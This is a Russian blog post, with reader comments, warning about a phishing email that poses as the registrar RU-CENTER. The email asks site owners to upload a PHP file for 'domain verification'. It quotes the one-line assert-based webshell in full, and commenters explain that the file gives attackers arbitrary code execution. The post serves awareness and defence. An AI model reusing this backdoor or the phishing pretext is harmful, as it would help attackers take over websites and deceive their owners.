Развод как он есть (или «подтверждение подтверждению рознь!»)

    Давно мне не попадалось такого красивого социального развода на действие (см. под катом). На фоне истории с блокировками и вообще затягивания гаек тем более приятно видеть, что кто-то сумел суровым тоном такое написать — ведь отдельные граждане и поведутся!

    image

    Мне думается, shared хостингам пора начинать фильтровать передаваемые в скрипты переменные, хотя имя переменной, уверен, в каждом случае разное.

    Получил в ящике, заведенном для административных целей, письмо якобы от имени RU-CENTER, со следующим текстом:

    Уважаемый клиент!

    В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что управление доменным именем domain.ru осуществляется лицом, указанным в качестве его администратора.

    Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл kk4tamko17q83015.php со следующим содержимым:

    <?php
    assert(stripslashes($_REQUEST[JJIZS]));
    ?>
    

    Файл должен быть создан в течение трех календарных дней с момента получения настоящего сообщения и присутствовать на сервере до 30 апреля 2018 года, 07:00 (UTC+03:00), в противном случае процедура верификации не будет пройдена.

    Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, обслуживание домена будет завершено.
    Письмо красиво оформлено в классическом стиле письмо и сайта nic.ru, так что внешне все выглядит весьма прилично.

    По-моему, просто прекрасная акция с использованием социальной инженерии!
    Сработает ли такая атака?

    Только зарегистрированные пользователи могут участвовать в опросе. Войдите, пожалуйста.

    Поделиться публикацией
    Похожие публикации
    Ой, у вас баннер убежал!

    Ну. И что?
    Реклама
    Комментарии 33
    • +2
      А если у меня сайт на бэйсике написан, что тогда делать?
      • +3
        А какая разница на чем сайт? Будет запрос на определенный файл, большинство хостингов исполнение php-скриптов поддерживают.

        P.S. большинство хостингов, которыми пользуются те, на кого развод подействует.
        • 0
          ну наверное «хакер» перед отправкой проверит возможность исполнения пэхэпэ)
          Хотя судя по содержимому скрипта который нужно создать… похоже на «хакеров» из вк которые отправляют «вирус» для подмены доменов в hosts файле…
          • +1
            А что не так с содержимым скрипта?
            • +3

              Я не настоящий сварщик пхп-кодер, но похоже, что там тупо выполняется скрипт переданный как параметр в запросе. Т.е. это готовый шелл.

      • +1
        «Вы должны подтвердить, что управление доменным именем domain.ru осуществляется лицом, указанным в качестве его администратора.»
        И как размещение файлика может в принципе подтвердить, что управление доменом осуществляется Ивановым Иваном Ивановичем, а не Петровым Петром Петровичем?
        Я не знаю, как на такое можно повестись.
        • +1
          ну, например, у яндеков с гуглов есть такое же подтверждение(создание файла) что это твой домен
          • +2
            Не путайте. «яндексы и гуглы» проверяют, что к ним («яндексам и гуглам») обращается человек, имеющий права на управления доменом.
            Тот ли это человек, который указан в качестве администратора, или совсем другой, «яндексов и гуглов» не волнует.
      • +1
        Эм… Простите за мой французский, но это же лютый боян и даже сам RU-CENTER рассылал письма-предупреждения, что есть такой развод и не ведитесь на него.
        • +1
          Пфф, каждое утро в почте вижу попытки развода — то квитанции
          Типа
          Thank you.
          You've made a purchase from Battle Bay on App Store.

          Order number: APP.7419-9040-3156-01951
          Order date: April 17, 2018 01:47:50 AM EDT
          Item Price
          Mug Of Pearls — Get resources, skip waiting with 1,200 pearls US$10.99
          Total: US$10.99
          (Includes TAX of US$0.99)
          Payment method:
          iPay
          It's not you? Cancel Payment


          То письма от Netflix «Бла, бла, бла, что-то пошло не так, мы приостановили действие вашего аккаунта, обновите платёжные реквизиты». Ага, щаз. Только сначала зарегистрируюсь на Нетфликсе.
          Обострение весеннее, похоже. Давно таких откровенных попыток развода не видел
          • 0
            Везет вам! Или антиспам не работает?
            • 0
              Работает, но иногда проскакивают такие послания. С начала апреля примерно начались.
            • 0

              первое похоже на валидный чек, просто не ваш =)

              • 0
                Угу, очень похоже. Когда это мне первый раз пришло, я аж напрягся и чуть не полез в онлайн-банк последние операции смотреть. Потом пригляделся внимательнее, увидел внизу «It's not you? Cancel Payment» — сходите по ссылочке и отмените платёж, выдохнул и продолжил читать Хабр. Приходит эта дрянь теперь пару раз в неделю.
              • +1

                Для тех кто не в теме, не мешало бы в статье дать краткие пояснения, что делает этот код. Понятно, что злоумышленник потом впишет путь к этому файлу на сайте в браузер, но вот что он увидит?

                • 0
                  Да прям на хабре почитайте, что это и зачем.
                  habrahabr.ru/post/138443
                  • 0
                    assert в PHP работает как eval — исполняет произвольный код если ему передать строку. Если кто-то последует этому совету — злоумышленник получит универсальный бэкдор.
                  • +1

                    Да это старая как мир разводка. Текст писем меняется, переменные меняются, бывает что код скрипта немного меняют(в одной версии заюзан base64(а иногда и gzip), в другой нет, в одной eval, в другой assert и т.п.) — но суть всех этих разводок и логика работы скрипта всегда одна и та же. Верояно, это какие-то скрипт-кидди уже не один год так развлекаются. Странно, что люди до сих пор ведутся на этот трюк и сами добавляют бэкдорчик на свой сайт. Социнжиниринг — это сила.

                    • 0

                      Согласен. Но в этом случае был поражен наглостью. И ведь ничего им не предъявишь на этом этапе: тебе прислали код, ты его сам выложил. Они станут редисками, когда через этот код заставят твой сервер что-не то делать, но и то — юридически тебя просто ввели в заблуждение, но пустил-то ты их сам!

                      • 0

                        Верно, на удивление нахраписто действуют парни. И предъявить им что-то не просто, как правило они код дёргают не напрямую со своего хоста, а через цепочку проксиков(подозреваю, что это поломанные ими VPS-ки вполне добропорядочных граждан). Что-бы таких товарищей отловить, нужно целую спец-операцию произвести с участием правоохранительных органов, хостеров на чьих серваках крутятся вломанные услуги заюзанные для проксирования и пострадавшими лицами, получившими подобные письма. Времени и сил это потребует немало, а на выходе будут пойманы нескольк скрипт-кидди. IMHO, но с точки зрения правоохранительных органов овчинка выделки не стоит.

                    • 0
                      Баянище. Если есть настроение, можно по логам посмотреть откуда дергается проверка и что передают(спойлер — первый запрос безобидный). Можешь абуз хостеру отправить(не забудь приложить текст письма и логи). Реагируют адекватно.
                      ЗЫ Автор не видел реально красивых разодов.
                      • 0
                        Готов поверить, что не видел. Не везло — или всё же везло?

                        А можно попросить рассказать?
                      • 0
                        Я бы повёлся, если просили разместить html документ. Хотя, скорее всего, сперва бы написал в техподдержку хостера.
                        А вот php файл не стал бы добавлять точно.
                        • 0
                          А если бы РКН «попросил» разместить, но именно подобный файл PHP?
                          • 0
                            «Ключи шифрования — это, в первую очередь, желание соблюсти закон...» и т.д.
                            У меня хостинг в России, поэтому у меня просто не будет выбора. И, придётся переносить хостинг.)
                            • 0
                              А как же «не сдает ключи тот, кому нечего скрывать»? Шутка.

                              Я смотрю, сейчас отличная тема для части контор уйти за границу, а для части — придти в Россию с Амазона.
                              • 0
                                У меня «уникальная» ситуация, которую не касается Я-пакет. Ни регистрации пользователей, ни чатов, ни прочего. Я вообще мог бы обойтись страничкой в ВК (она итак есть) или лэндингом в какой-нибудь бесплатной народной помойке. Даже от https отказался из-за отсутствия необходимости. Так что, конкретно в моём случае, когда нет ни коммерческой тайны, ни данных пользователей, ни паролей, ни прочего, я совершенно спокойно дам доступ любым правоохранительным структурам, если попросят. Потому что мне нечего скрывать от слова «вообще». В любой другой ситуации — однозначный перенос хостинга на неподконтрольные сервера. Возможно и перенос домена из зоны ru.
                        • 0
                          Можно выложить файл с таким именем, но только код поменять и вывести:
                          <? echo "Ваш айпи адрес ".$_SERVER['REMOTE_ADDR']." был записан. Ваша попытка атаки зарегистрирована. Направили заявление в правохранительные органы для уточнения вашей личности. Ждите наряд и не покидайте место преступления"; ?>

                          Учитывая уровень «хакерской атаки» можно заставить поволноваться уже «хакеров».
                          • +2
                            Думаете, они глазами ответ сервера читают? Просто три дня сканят по кругу все домены, кому послали письмо, где есть ответ, там проверка, что шел «пошёл», и передача хоста для дальнейшей эксплуатации шела на следующий шаг.

                            Хозяин робота при этом сидит на Канарах в школе и ответов вашего сервера точно не читает. *смайлик*
                            • 0
                              Это как вариант, а может робот просто собирает места где шелл прошёл и потом злоумышленник уже делает что хочет в ручную. В любом случае тут и трудозатраты небольшие.

                          Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                          Самое читаемое